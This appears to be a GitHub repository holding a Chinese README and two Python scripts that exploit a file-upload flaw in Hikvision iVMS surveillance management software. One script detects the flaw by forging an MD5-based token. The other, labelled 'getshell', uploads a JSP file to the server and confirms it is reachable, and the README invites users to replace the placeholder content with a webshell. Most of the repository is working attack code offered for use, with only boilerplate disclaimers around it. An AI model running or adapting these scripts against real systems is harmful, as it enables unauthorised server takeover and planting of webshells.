├── README.md ├── hkvs-ivms-fileupload-poc.py └── hkvs-ivms-fileupload-getshell.py /README.md: -------------------------------------------------------------------------------- 1 | # hkvs-ivms-fileupload-poc 2 | 3 | 海康威视文件上传检测脚本 4 | 5 | 6 | # 免责声明 7 | 使用本程序请自觉遵守当地法律法规,出现一切后果均与作者无关。 8 | 9 | 本工具旨在帮助企业快速定位漏洞修复漏洞,仅限授权安全测试使用! 10 | 11 | 严格遵守《中华人民共和国网络安全法》,禁止未授权非法攻击站点! 12 | 13 | 由于用户滥用造成的一切后果与作者无关。 14 | 15 | 切勿用于非法用途,非法使用造成的一切后果由自己承担,与作者无关。 16 | 17 | ### 食用方法 18 | 19 | ``` 20 | python .\hkvs-ivms-fileupload-poc.py -u http://xx.xx.xx.xx 21 | ``` 22 | 23 | 效果图 24 | 25 | ### 图放错啦,该图片是实验之前的图片,文件名字忘记改了,所以测试脚本还是hkvs-ivms-fileupload-poc.py 26 | 27 | ![image](https://github.com/FeiNiao/hkvs-ivms-fileupload-poc/assets/66779835/5a563d28-2ad2-4d8d-a44c-1041c1142246) 28 | 29 | 提示上传附件失败,上传文件不能为空,说明存在漏洞并且可以上传文件 30 | 31 | 失败提示 32 | 33 | ![image](https://github.com/FeiNiao/hkvs-ivms-fileupload-poc/assets/66779835/3137c82d-ddf7-4a27-8a56-16bdadb80616) 34 | 35 | ## 文件上传 36 | 验证完成后可以使用getshell脚本测试文件上传 37 | ### 食用方法 38 | ``` 39 | python .\hkvs-ivms-fileupload-getshell.py -u http://xx.xxx.xx.xx 40 | ``` 41 | 效果图 42 | 43 | ![image](https://github.com/FeiNiao/hkvs-ivms-fileupload-poc/assets/66779835/9daf337f-c507-4385-a369-6814723541dd) 44 | 45 | 根据脚本提示访问地址进行查看 46 | 47 | ![image](https://github.com/FeiNiao/hkvs-ivms-fileupload-poc/assets/66779835/d703fc4d-e2cf-4f9f-aef1-dc1232880d5e) 48 | 49 | 原创脚本并没有上传webshell,而是使用了`hkvs`字符进行替代,如有需要请自行修改为webshell。 50 | 由于用户滥用造成的一切后果与作者无关,切勿用于非法用途,非法使用造成的一切后果由自己承担,与作者无关。 51 | -------------------------------------------------------------------------------- /hkvs-ivms-fileupload-poc.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | import urllib 3 | import requests 4 | import warnings 5 | import sys 6 | 7 | banner=""" 8 | ______ _ _ _ _ 9 | | ____| (_) \ | (_) 10 | | |__ ___ _| \| |_ __ _ ___ 11 | | __/ _ \ | . ` | |/ _` |/ _ \ 12 | | | | __/ | |\ | | (_| | (_) | 13 | |_| \___|_|_| \_|_|\__,_|\___/ 14 | version:1.10 15 | 16 | 海康威视IVMS文件上传漏洞检测脚本 17 | 18 | """ 19 | 20 | warnings.filterwarnings("ignore") 21 | header = { 22 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36", 23 | "Cookie": "ISMS_8700_Sessionname=ABCB193BD9D82CC2D6094F6ED4D81169" 24 | } 25 | poc = "/eps/api/resourceOperations/uploadsecretKeyIbuilding" 26 | poc1 = "/eps/api/resourceOperations/upload?token=" 27 | 28 | def mdencode(url): 29 | hashurl = url + poc 30 | hl = hashlib.md5() 31 | hl.update(hashurl.encode(encoding='utf-8')) 32 | return (hl.hexdigest()).upper() 33 | 34 | def poccheck(url): 35 | data = { 36 | "service": urllib.parse.quote(url + "/home/index.action") 37 | } 38 | hs = mdencode(url) 39 | try: 40 | response = requests.post(url=url + poc1 + hs, headers=header, data=data, verify=False, timeout=10) 41 | if "success" in response.text: 42 | print("\033[0;32;40m[+] {} 疑似存在海康威视文件上传漏洞!!! response返回内容: {}\033[0m".format(url,response.text)) 43 | else: 44 | print("\033[0;31;40m[-] {} 未发现海康威视文件上传漏洞\033[0m".format(url)) 45 | except Exception as e: 46 | print("url:{} 请求失败".format(url)) 47 | 48 | if __name__ == '__main__': 49 | print(banner) 50 | url = sys.argv[2] 51 | poccheck(url) 52 | 53 | -------------------------------------------------------------------------------- /hkvs-ivms-fileupload-getshell.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | import urllib 3 | import requests 4 | import warnings 5 | import sys 6 | 7 | banner=""" 8 | ______ _ _ _ _ 9 | | ____| (_) \ | (_) 10 | | |__ ___ _| \| |_ __ _ ___ 11 | | __/ _ \ | . ` | |/ _` |/ _ \ 12 | | | | __/ | |\ | | (_| | (_) | 13 | |_| \___|_|_| \_|_|\__,_|\___/ 14 | version:1.10.1 15 | 16 | 海康威视IVMS文件上传漏洞getshell脚本 17 | 18 | """ 19 | 20 | warnings.filterwarnings("ignore") 21 | headere = { 22 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36", 23 | "Cookie": "ISMS_8700_Sessionname=ABCB193BD9D82CC2D6094F6ED4D81169", 24 | "Content-Type" :"multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPo" 25 | } 26 | poc = "/eps/api/resourceOperations/uploadsecretKeyIbuilding" 27 | poc1 = "/eps/api/resourceOperations/upload?token=" 28 | 29 | 30 | def mdencode(url): 31 | hashurl = url + poc 32 | hl = hashlib.md5() 33 | hl.update(hashurl.encode(encoding='utf-8')) 34 | return (hl.hexdigest()).upper() 35 | 36 | def uploadtext(url): 37 | print("正在进行文件上传 {} 请稍后".format(url)) 38 | headere = { 39 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36", 40 | "Cookie": "ISMS_8700_Sessionname=ABCB193BD9D82CC2D6094F6ED4D81169", 41 | "Content-Type" :"multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPo" 42 | } 43 | 44 | data ='------WebKitFormBoundaryGEJwiloiPo\r\nContent-Disposition: form-data; name="fileUploader";filename="1.jsp"\r\nContent-Type: image/jpeg\r\n\r\nhkvs\r\n------WebKitFormBoundaryGEJwiloiPo' 45 | 46 | hs = mdencode(url) 47 | try: 48 | res = requests.post(url=url + poc1 + hs,headers=headere,data=data) 49 | path = res.text.replace('\"',"").replace('{',"").replace('}',"").split('resourceUuid:')[1].split(",resourceType")[0] 50 | ress = requests.get(url=url+"/eps/upload/"+path+".jsp",verify=False,timeout=10,headers=headere) 51 | if "hkvs" in ress.text and ress.status_code == 200: 52 | print("文件上传成功,请访问 {} 进行查看!!!".format(url+"/eps/upload/"+path+".jsp")) 53 | except Exception as e: 54 | print("文件上传失败: {}".format(url)) 55 | print(e) 56 | 57 | if __name__ == '__main__': 58 | print(banner) 59 | url = sys.argv[2] 60 | uploadtext(url) 61 | 62 | --------------------------------------------------------------------------------